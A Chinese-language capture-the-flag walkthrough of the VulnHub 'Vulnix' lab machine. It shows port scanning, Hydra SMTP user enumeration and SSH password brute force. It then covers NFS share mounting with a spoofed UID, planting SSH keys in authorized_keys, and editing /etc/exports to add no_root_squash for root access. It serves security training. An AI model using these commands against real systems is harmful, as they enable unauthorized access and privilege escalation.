[Vulnhub]Vulnix 通过NFS挂载+SSH公钥免密登录权限提升

news2024/11/15 17:52:19

端口扫描

Server IP Address	Ports Open
192.168.8.103	TCP:22/tcp, 25/tcp, 79/tcp, 110/tcp, 111/tcp, 143/tcp, 512/tcp, 513/tcp, 514/tcp, 993/tcp, 995/tcp, 2049/tcp, 37522/tcp, 42172/tcp, 43219/tcp, 47279/tcp, 54227/tcp

$ nmap -p- 192.168.8.103 -sV -sC --min-rate 1000

扫描结果:

Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open  smtp       Postfix smtpd
|_ssl-date: 2024-05-26T06:52:43+00:00; +5s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after:  2022-08-31T17:40:12
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
79/tcp    open  finger     Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open  pop3?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2024-05-26T06:52:42+00:00; +4s from scanner time.
|_pop3-capabilities: CAPA SASL STLS PIPELINING TOP UIDL RESP-CODES
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      47279/tcp   mountd
|   100005  1,2,3      51842/udp6  mountd
|   100005  1,2,3      52038/udp   mountd
|   100005  1,2,3      56231/tcp6  mountd
|   100021  1,3,4      37147/tcp6  nlockmgr
|   100021  1,3,4      37522/tcp   nlockmgr
|   100021  1,3,4      48225/udp   nlockmgr
|   100021  1,3,4      48542/udp6  nlockmgr
|   100024  1          38159/tcp6  status
|   100024  1          49174/udp   status
|   100024  1          50824/udp6  status
|   100024  1          54227/tcp   status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2024-05-26T06:52:43+00:00; +5s from scanner time.
|_imap-capabilities: post-login LITERAL+ ENABLE more STARTTLS LOGINDISABLEDA0001 ID IMAP4rev1 capabilities SASL-IR listed have IDLE OK Pre-login LOGIN-REFERRALS
512/tcp   open  exec?
513/tcp   open  login?
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imap   Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_imap-capabilities: post-login LITERAL+ ENABLE LOGIN-REFERRALS more ID IMAP4rev1 AUTH=PLAINA0001 SASL-IR listed have IDLE capabilities Pre-login OK
|_ssl-date: 2024-05-26T06:52:42+00:00; +4s from scanner time.
995/tcp   open  ssl/pop3   Dovecot pop3d
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2024-05-26T06:52:42+00:00; +4s from scanner time.
|_pop3-capabilities: CAPA SASL(PLAIN) USER PIPELINING TOP UIDL RESP-CODES
2049/tcp  open  nfs        2-4 (RPC #100003)
37522/tcp open  nlockmgr   1-4 (RPC #100021)
42172/tcp open  mountd     1-3 (RPC #100005)
43219/tcp open  mountd     1-3 (RPC #100005)
47279/tcp open  mountd     1-3 (RPC #100005)
54227/tcp open  status     1 (RPC #100024)
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

爆破SMTP用户

$ hydra -L /usr/share/seclists/Usernames/Names/names.txt -s 25 192.168.8.103 smtp-enum

用户名.

bin
irc
mail
nab
root
sys
user

批量测试用户名可用性

$ xargs -a username -I {} finger {}@192.168.8.103

在Linux中，finger是一个用户信息查询命令。它用于显示系统用户的信息，包括他们的全名、登录时间、空闲时间、终端位置、办公地点和电话号码。该命令最初是为Unix系统设计的，目前仍在许多Unix和Linxu发行版中可用。

结果:

Login: bin                              Name: bin
Directory: /bin                         Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: irc                              Name: ircd
Directory: /var/run/ircd                Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: mail                             Name: mail
Directory: /var/mail                    Shell: /bin/sh
Never logged in.
No mail.
No Plan.

Login: dovecot                          Name: Dovecot mail server
Directory: /usr/lib/dovecot             Shell: /bin/false
Never logged in.
No mail.
No Plan.
finger: nab: no such user.
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: sys                              Name: sys
Directory: /dev                         Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

SSH爆破

使用Hydra SSH爆破.

[22][ssh] host: 192.168.8.103 login: user password: letmein

权限提升

用户:vulnix

从扫描结果中发现NFS服务

$ showmount --exports 192.168.8.103

输出指示192.168.8.103上的NFS服务器共享/home/vulnix目录，并允许所有客户端使用通配符*进行装载。这意味着任何具有访问权限的主机都可以将/home/vulnix目录装载到自己的文件系统中，并对其中的文件进行读写操作。

将/mnt/vulnix挂载到远程服务器。

我们需要在kali中创建一个与目标完全相同的用户，并记住UID

$ sudo mkdir /mnt/vulnix

$ sudo adduser -u 2008 vulnix

password:123

我们将此文件夹与VULNIX服务器上的一个文件夹相关联。

$ sudo mount 192.168.8.103:/home/vulnix /mnt/vulnix -o vers=3

我们为VULNIX用户生成了一个conv keygen RSA密钥，使我们能够在原始计算机上进行身份验证。

$ su vulnix
$ mkdir /mnt/vulnix/.ssh
$ ssh-keygen -t ssh-rsa
$ cp ~/.ssh/id_rsa.pub /mnt/vulnix/.ssh/authorized_keys

Access SSH

$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ~/.ssh/id_rsa vulnix@192.168.8.103

用户:Root

$ sudo -l

sudoedet是一个使用root权限安全编辑文件的命令。它允许您在不直接进入超级用户模式的情况下编辑系统文件。

$ sudoedit /etc/exports

加入以下语句

/root *(rw,no_root_squash)

no_root_squash 是 NFS（Network File System）配置选项之一，用于控制远程 root 用户在 NFS 共享目录上执行操作时的权限。它的作用是允许远程的 root 用户拥有与本地 root 用户相同的权限。

重启服务器,让配置文件生效

$ showmount -e 192.168.8.103

我们成功地映射了根目录。

$ sudo mkdir /mnt/vulnroot

$ sudo mount 192.168.8.103:/root /mnt/vulnroot -o vers=3

$ sudo cat /mnt/vulnroot/trophy.txt

cc614640424f5bd60ce5d5264899c3be

获取交互式ROOT用户

$ sudo ssh-keygen -t ssh-rsa
$ sudo mkdir /mnt/vulnroot/.ssh
$ sudo cp /root/.ssh/id_rsa.pub /mnt/vulnroot/.ssh/authorized_keys
$ sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i /root/.ssh/id_rsa root@192.168.8.103